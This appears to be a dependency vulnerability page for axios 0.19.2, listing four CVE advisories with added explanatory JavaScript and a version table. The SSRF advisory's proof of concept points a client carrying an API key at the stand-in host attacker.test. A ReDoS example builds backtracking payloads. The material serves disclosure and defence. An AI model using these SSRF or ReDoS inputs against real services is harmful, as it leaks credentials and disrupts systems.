NodeJS/axios/0.19.2


Promise based HTTP client for the browser and node.js

https://www.npmjs.com/package/axios
MIT

4 Security Vulnerabilities

Axios vulnerable to Server-Side Request Forgery

Published date: 2021-01-04T20:59:40Z
CVE: CVE-2020-28168

Axios NPM package versions up to and including 0.21.0 contain a Server-Side Request Forgery (SSRF) vulnerability: when a proxy is configured, an attacker who supplies a URL that responds with a redirect to a restricted host or IP address can cause the redirected request to be made directly, bypassing the proxy and whatever egress restrictions it enforces.

Affected versions: ["0.1.0", "0.2.0", "0.2.2", "0.3.1", "0.2.1", "0.3.0", "0.5.0", "0.5.1", "0.5.2", "0.5.3", "0.5.4", "0.7.0", "0.8.0", "0.8.1", "0.10.0", "0.11.0", "0.12.0", "0.13.1", "0.14.0", "0.15.0", "0.15.2", "0.16.1", "0.16.2", "0.17.0", "0.17.1", "0.18.0", "0.19.0-beta.1", "0.19.0", "0.19.2", "0.21.0", "0.4.0", "0.4.1", "0.4.2", "0.6.0", "0.9.0", "0.9.1", "0.11.1", "0.13.0", "0.15.1", "0.15.3", "0.16.0", "0.18.1", "0.19.1", "0.20.0-0", "0.20.0"]
Secure versions: [0.30.0, 1.0.0-alpha.1, 1.10.0, 1.8.2, 1.8.3, 1.8.4, 1.9.0]
Recommendation: Update to version 1.10.0.

axios Inefficient Regular Expression Complexity vulnerability

Published date: 2021-09-01T18:23:02Z
CVE: CVE-2021-3749

axios before v0.21.2 is vulnerable to Inefficient Regular Expression Complexity (ReDoS, CWE-1333): an attacker-controlled string that reaches the affected regular expression triggers catastrophic backtracking, and because the match runs synchronously on the event loop the process stalls for the duration of the match.
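
To see what inefficient regular expression complexity means in practice, here is an added example (not code from this page or from axios) that reproduces the pattern class behind this advisory and the linear-time replacement. It assumes, from the upstream fix rather than from the text above, that the slow expression was a whitespace-trimming regex anchored at the end of the string (`\s*$`); the payload generator and the timing helper are constructed for this illustration.

```javascript
// Added example (not axios code): why an end-anchored `\s*$` is a ReDoS
// sink, and a linear-time replacement. The pattern is my reading of the
// upstream fix for this advisory, not something this page states.

// Vulnerable form: `\s*$` is tried from every start position. On a long
// run of spaces that does NOT end the string, each attempt greedily eats
// the run, fails at `$`, and backtracks one space at a time, so total
// work is O(n^2) in the number of spaces.
function regexTrim(str) {
  return str.replace(/^\s*/, '').replace(/\s*$/, '');
}

// Safe form: String.prototype.trim scans inward from each end exactly once.
function safeTrim(str) {
  return String(str).trim();
}

// Constructed attacker input: n spaces followed by one non-space, so the
// whitespace run never satisfies `$`.
function redosPayload(n) {
  return ' '.repeat(n) + 'x';
}

// Wall-clock milliseconds for one call of fn(input).
function measureMs(fn, input) {
  const start = process.hrtime.bigint();
  fn(input);
  return Number(process.hrtime.bigint() - start) / 1e6;
}

// Run both implementations on the same payload and report the cost.
// The outputs agree; only the time differs (quadratic vs. linear).
function compareTrims(n) {
  const payload = redosPayload(n);
  const regexMs = measureMs(regexTrim, payload);
  const safeMs = measureMs(safeTrim, payload);
  return {
    n,
    sameResult: regexTrim(payload) === safeTrim(payload),
    regexMs,
    safeMs,
  };
}

// Stand-alone run: node redos-trim.js
if (typeof require !== 'undefined' && require.main === module) {
  console.log(compareTrims(20000));
}
```

Doubling `n` roughly quadruples `regexMs` while `safeMs` stays flat; that growth curve, not any single timing, is the signal to look for when auditing a regex that handles untrusted input.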

Affected versions: ["0.1.0", "0.2.0", "0.2.2", "0.3.1", "0.2.1", "0.3.0", "0.5.0", "0.5.1", "0.5.2", "0.5.3", "0.5.4", "0.7.0", "0.8.0", "0.8.1", "0.10.0", "0.11.0", "0.12.0", "0.13.1", "0.14.0", "0.15.0", "0.15.2", "0.16.1", "0.16.2", "0.17.0", "0.17.1", "0.18.0", "0.19.0-beta.1", "0.19.0", "0.19.2", "0.21.0", "0.4.0", "0.4.1", "0.4.2", "0.6.0", "0.9.0", "0.9.1", "0.11.1", "0.13.0", "0.15.1", "0.15.3", "0.16.0", "0.18.1", "0.19.1", "0.20.0-0", "0.20.0", "0.21.1"]
Secure versions: [0.30.0, 1.0.0-alpha.1, 1.10.0, 1.8.2, 1.8.3, 1.8.4, 1.9.0]
Recommendation: Update to version 1.10.0.

axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL

Published date: 2025-03-07T15:16:00Z
CVE: CVE-2025-27152

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet (an ES module, since it uses import and top-level await):

import axios from "axios";

// Client for an internal API; every request carries the API key.
const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";               // expected: a single path segment
const userId = "http://attacker.test/"; // attacker-controlled value

await internalAPIClient.get(userId); // SSRF: the absolute URL overrides baseURL

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

  • When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
  • Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

  1. Set up two simple HTTP servers (python -m http.server accepts -d/--directory on Python 3.7 or later):
     mkdir /tmp/server1 /tmp/server2
     echo "this is server1" > /tmp/server1/index.html
     echo "this is server2" > /tmp/server2/index.html
     python -m http.server -d /tmp/server1 10001 &
     python -m http.server -d /tmp/server2 10002 &
  2. Create a script (e.g., main.js; it uses import and top-level await, so run it as an ES module, for example by naming it main.mjs or setting "type": "module" in package.json):
     import axios from "axios";
     const client = axios.create({ baseURL: "http://localhost:10001/" });
     const response = await client.get("http://localhost:10002/");
     console.log(response.data);
  3. Run the script:
     $ node main.js
     this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

  • Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  • Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.
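
An added example (not axios code and not part of this advisory) that models the behaviour the PoC above shows next to the check the recommendations ask for. `vulnerableRequestUrl` mirrors how a base URL and a caller-supplied path are combined when absolute and protocol-relative values are passed through unchanged (the regex is my simplification of that logic, not axios's source); `safeRequestUrl` treats the caller's value as a single path segment and then verifies that the resolved URL still sits under the configured base, so an attacker value can never redirect the request elsewhere. The host names are the advisory's own placeholders.

```javascript
// Added example (not axios code): the absolute-URL override behind this
// advisory, beside a join that keeps caller input inside baseURL.

// Matches "scheme://..." or a protocol-relative "//host/..." (the latter is
// the earlier SSRF variant the advisory cites). My simplification, not
// the library's own check.
const ABSOLUTE_URL = /^([a-z][a-z\d+\-.]*:)?\/\//i;

function isAbsoluteUrl(value) {
  return ABSOLUTE_URL.test(value);
}

// Vulnerable model: an absolute or protocol-relative value wins over
// baseURL, which is exactly how the PoC reaches server2 instead of server1.
function vulnerableRequestUrl(baseURL, requested) {
  if (baseURL && !isAbsoluteUrl(requested)) {
    return baseURL.replace(/\/+$/, '') + '/' + requested.replace(/^\/+/, '');
  }
  return requested;
}

// Hardened join: the caller's value is a path segment, never a URL.
//  1. refuse anything that already looks like a URL,
//  2. percent-encode it so "/", "?", "#" and ".." cannot change routing,
//  3. resolve against baseURL and confirm origin and path prefix survived
//     (step 3 is defence in depth; after step 2 it should never fire).
function safeRequestUrl(baseURL, segment) {
  if (typeof segment !== 'string' || segment.length === 0) {
    throw new TypeError('path segment must be a non-empty string');
  }
  if (isAbsoluteUrl(segment)) {
    throw new Error('absolute or protocol-relative URL rejected: ' + segment);
  }
  const base = new URL(baseURL);
  // A base without a trailing slash would lose its last segment on resolve.
  if (!base.pathname.endsWith('/')) base.pathname += '/';
  const target = new URL(encodeURIComponent(segment), base);
  if (target.origin !== base.origin || !target.pathname.startsWith(base.pathname)) {
    throw new Error('resolved URL escapes baseURL: ' + target.href);
  }
  return target.href;
}

// Stand-alone run: node absolute-url-ssrf.js
if (typeof require !== 'undefined' && require.main === module) {
  const BASE = 'http://example.test/api/v1/users/';
  console.log('vulnerable:', vulnerableRequestUrl(BASE, 'http://attacker.test/'));
  console.log('safe:      ', safeRequestUrl(BASE, '123'));
  try {
    safeRequestUrl(BASE, 'http://attacker.test/');
  } catch (e) {
    console.log('rejected:  ', e.message);
  }
}
```

To my knowledge the 1.8.x fix line also adds a request option (allowAbsoluteUrls) for refusing such values inside the client; verify that against the changelog of the release you deploy. The application-side check above is still worth keeping, because it also neutralises values that are merely path traversal (`../../admin`) rather than full URLs.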

Affected versions: ["0.1.0", "0.2.0", "0.2.2", "0.3.1", "0.2.1", "0.3.0", "0.5.0", "0.5.1", "0.5.2", "0.5.3", "0.5.4", "0.7.0", "0.8.0", "0.8.1", "0.10.0", "0.11.0", "0.12.0", "0.13.1", "0.14.0", "0.15.0", "0.15.2", "0.16.1", "0.16.2", "0.17.0", "0.17.1", "0.18.0", "0.19.0-beta.1", "0.19.0", "0.19.2", "0.21.0", "0.4.0", "0.4.1", "0.4.2", "0.6.0", "0.9.0", "0.9.1", "0.11.1", "0.13.0", "0.15.1", "0.15.3", "0.16.0", "0.18.1", "0.19.1", "0.20.0-0", "0.20.0", "0.21.1", "0.21.2", "0.21.3", "0.21.4", "0.22.0", "0.23.0", "0.24.0", "0.25.0", "0.26.0", "0.26.1", "0.27.0", "0.27.1", "0.27.2", "0.28.0", "0.28.1", "0.29.0", "1.0.0", "1.1.0", "1.1.1", "1.1.2", "1.1.3", "1.2.0-alpha.1", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.3.6", "1.4.0", "1.5.0", "1.5.1", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.6.5", "1.6.6", "1.6.7", "1.6.8", "1.7.0-beta.0", "1.7.0-beta.1", "1.7.0-beta.2", "1.7.0", "1.7.1", "1.7.2", "1.7.3", "1.7.4", "1.7.5", "1.7.6", "1.7.7", "1.7.8", "1.7.9", "1.8.0", "1.8.1"]
Secure versions: [0.30.0, 1.0.0-alpha.1, 1.10.0, 1.8.2, 1.8.3, 1.8.4, 1.9.0]
Recommendation: Update to version 1.10.0.

Axios Cross-Site Request Forgery Vulnerability

Published date: 2023-11-08T21:30:37Z
CVE: CVE-2023-45857

An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host, allowing attackers to view sensitive information. The token is the client half of the double-submit cookie pattern, so it is deliberately readable by JavaScript; the defect is that the header is attached without checking that the destination is the same origin that issued the cookie. Any cross-origin request the application makes through axios therefore hands the token to that third-party host, which defeats the CSRF protection the token exists to provide.
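
The following is an added example (not axios code) of the two behaviours as plain functions: a client that copies the XSRF-TOKEN cookie into X-XSRF-TOKEN for every request, as the affected versions did, beside one that only does so when the request resolves to the page's own origin or the caller explicitly opts in. The cookie string and page origin are constructed for this illustration; the opt-in flag is named `withXSRFToken` after the option the fixed releases introduced, to my knowledge, and should be treated as an assumption here.

```javascript
// Added example (not axios code): XSRF-token header handling, leaky and
// origin-checked. All inputs below are constructed for this illustration.

const XSRF_COOKIE = 'XSRF-TOKEN';
const XSRF_HEADER = 'X-XSRF-TOKEN';

// Minimal document.cookie parser: "a=1; b=2" -> value of `name`, or null.
function readCookie(cookieString, name) {
  for (const part of cookieString.split(';')) {
    const eq = part.indexOf('=');
    if (eq === -1) continue;
    if (part.slice(0, eq).trim() === name) {
      return decodeURIComponent(part.slice(eq + 1).trim());
    }
  }
  return null;
}

// Affected behaviour: the token is attached whenever the cookie exists,
// regardless of which host the request is going to.
function xsrfHeadersLeaky(requestUrl, cookieString) {
  const token = readCookie(cookieString, XSRF_COOKIE);
  return token ? { [XSRF_HEADER]: token } : {};
}

// Mitigated behaviour: resolve the request URL against the page origin and
// attach the token only for same-origin destinations (scheme, host and port
// all equal), or when the caller opts in for a specific cross-origin call.
// `withXSRFToken` is the assumed name of that opt-in.
function xsrfHeadersSafe(requestUrl, pageOrigin, cookieString, { withXSRFToken = false } = {}) {
  const token = readCookie(cookieString, XSRF_COOKIE);
  if (!token) return {};
  const target = new URL(requestUrl, pageOrigin); // relative URLs stay on-origin
  const sameOrigin = target.origin === new URL(pageOrigin).origin;
  return withXSRFToken || sameOrigin ? { [XSRF_HEADER]: token } : {};
}

// Stand-alone run: node xsrf-header.js
if (typeof require !== 'undefined' && require.main === module) {
  const cookies = 'session=abc; XSRF-TOKEN=tok-123; theme=dark'; // constructed
  const origin = 'https://app.example.test';                    // constructed
  console.log('leaky, cross-origin:', xsrfHeadersLeaky('https://attacker.test/collect', cookies));
  console.log('safe, cross-origin: ', xsrfHeadersSafe('https://attacker.test/collect', origin, cookies));
  console.log('safe, same-origin:  ', xsrfHeadersSafe('/api/items', origin, cookies));
}
```

Note that a port mismatch is a different origin: a token minted for `https://app.example.test` must not be sent to `https://app.example.test:444`, and the check above treats them as distinct for that reason.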

Affected versions: ["0.8.1", "0.10.0", "0.11.0", "0.12.0", "0.13.1", "0.14.0", "0.15.0", "0.15.2", "0.16.1", "0.16.2", "0.17.0", "0.17.1", "0.18.0", "0.19.0-beta.1", "0.19.0", "0.19.2", "0.21.0", "0.9.0", "0.9.1", "0.11.1", "0.13.0", "0.15.1", "0.15.3", "0.16.0", "0.18.1", "0.19.1", "0.20.0-0", "0.20.0", "0.21.1", "0.21.2", "0.21.3", "0.21.4", "0.22.0", "0.23.0", "0.24.0", "0.25.0", "0.26.0", "0.26.1", "0.27.0", "0.27.1", "0.27.2", "1.0.0", "1.1.0", "1.1.1", "1.1.2", "1.1.3", "1.2.0-alpha.1", "1.2.0", "1.2.1", "1.2.2", "1.2.3", "1.2.4", "1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.3.6", "1.4.0", "1.5.0", "1.5.1"]
Secure versions: [0.30.0, 1.0.0-alpha.1, 1.10.0, 1.8.2, 1.8.3, 1.8.4, 1.9.0]
Recommendation: Update to version 1.10.0.

115 Other Versions

Version        License  Vulns  Released          Age
(Vulns = number of known advisories affecting that version; blank means none listed)
1.10.0         MIT             2025-06-14 12:11  22 days
1.9.0          MIT             2025-04-24 20:18  2 months
1.8.4          MIT             2025-03-19 19:27  4 months
1.8.3          MIT             2025-03-12 07:24  4 months
1.8.2          MIT             2025-03-07 07:41  4 months
1.8.1          MIT      1      2025-02-26 09:07  4 months
1.8.0          MIT      1      2025-02-26 06:01  4 months
1.7.9          MIT      1      2024-12-04 07:38  7 months
1.7.8          MIT      1      2024-11-25 21:13  7 months
1.7.7          MIT      1      2024-08-31 22:02  10 months
1.7.6          MIT      1      2024-08-30 19:56  10 months
1.7.5          MIT      1      2024-08-23 13:32  11 months
1.7.4          MIT      1      2024-08-13 19:33  11 months
1.7.3          MIT      2      2024-08-01 16:16  11 months
1.7.2          MIT      2      2024-05-21 16:58  about 1 year
1.7.1          MIT      2      2024-05-20 13:32  about 1 year
1.7.0          MIT      2      2024-05-19 20:25  about 1 year
1.7.0-beta.2   MIT      2      2024-05-19 18:01  about 1 year
1.7.0-beta.1   MIT      2      2024-05-07 18:37  about 1 year
1.7.0-beta.0   MIT      2      2024-04-28 19:50  about 1 year
1.6.8          MIT      2      2024-03-15 16:32  over 1 year
1.6.7          MIT      2      2024-01-25 19:58  over 1 year
1.6.6          MIT      2      2024-01-24 23:12  over 1 year
1.6.5          MIT      2      2024-01-05 19:52  over 1 year
1.6.4          MIT      2      2024-01-03 22:10  over 1 year
1.6.3          MIT      2      2023-12-26 23:16  over 1 year
1.6.2          MIT      2      2023-11-14 20:36  over 1 year
1.6.1          MIT      2      2023-11-08 15:09  over 1 year
1.6.0          MIT      2      2023-10-26 21:15  over 1 year
1.5.1          MIT      3      2023-09-26 18:22  almost 2 years
1.5.0          MIT      3      2023-08-26 19:10  almost 2 years
1.4.0          MIT      3      2023-04-27 23:05  about 2 years
1.3.6          MIT      3      2023-04-19 19:38  about 2 years
1.3.5          MIT      3      2023-04-05 18:03  over 2 years
1.3.4          MIT      3      2023-02-22 21:06  over 2 years
1.3.3          MIT      3      2023-02-13 18:47  over 2 years
1.3.2          MIT      3      2023-02-03 18:10  over 2 years
1.3.1          MIT      2      2023-02-01 23:31  over 2 years
1.3.0          MIT      2      2023-01-31 16:55  over 2 years
1.2.6          MIT      2      2023-01-28 16:41  over 2 years
1.2.5          MIT      2      2023-01-26 15:06  over 2 years
1.2.4          MIT      2      2023-01-24 17:21  over 2 years
1.2.3          MIT      2      2023-01-17 17:56  over 2 years
1.2.2          MIT      2      2022-12-29 06:38  over 2 years
1.2.1          MIT      2      2022-12-05 19:39  over 2 years
1.2.0          MIT      2      2022-11-22 19:06  over 2 years
1.2.0-alpha.1  MIT      2      2022-11-10 19:06  over 2 years
1.1.3          MIT      2      2022-10-15 13:42  over 2 years
1.1.2          MIT      2      2022-10-07 10:14  over 2 years
1.1.1          MIT      2      2022-10-07 09:15  over 2 years